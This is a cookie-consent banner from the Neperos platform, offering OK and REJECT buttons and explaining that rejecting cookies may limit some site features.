By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT